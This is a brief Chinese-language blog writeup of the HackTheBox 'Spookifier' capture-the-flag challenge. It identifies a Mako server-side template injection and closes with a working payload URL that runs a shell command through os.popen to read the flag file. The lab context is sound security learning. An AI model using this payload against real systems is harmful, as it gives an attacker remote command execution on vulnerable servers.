HackTheBox-Challenges Spookifier Writeup
剛好這幾天在萬聖節應景解到這題XD
首先下面是這題的文件架構:
1 | ╰─ tree . ─╯ |
我們逛一下網站還有看一下 main.py
可以看到他是用 python mako 寫的,不過其實我們照著 ssti 的 checklist 測試也可以知道他是用 mako。
知道是 ssti 以後我們就可以撈 flag 了,這邊放上最後的 payload 參考:http://94.237.63.215:32454/?text=${self.module.runtime.util.os.popen(%22cat%20../flag*%22).read()}
Pwned !!!
- Title: HackTheBox-Challenges Spookifier Writeup
- Author: kazma
- Created at : 2024-10-31 12:59:04
- Updated at : 2024-10-31 13:42:37
- Link: https://kazma.tw/2024/10/31/HackTheBox-Challenges-Spookifier-Writeup/
- License: This work is licensed under CC BY-NC-SA 4.0.
Comments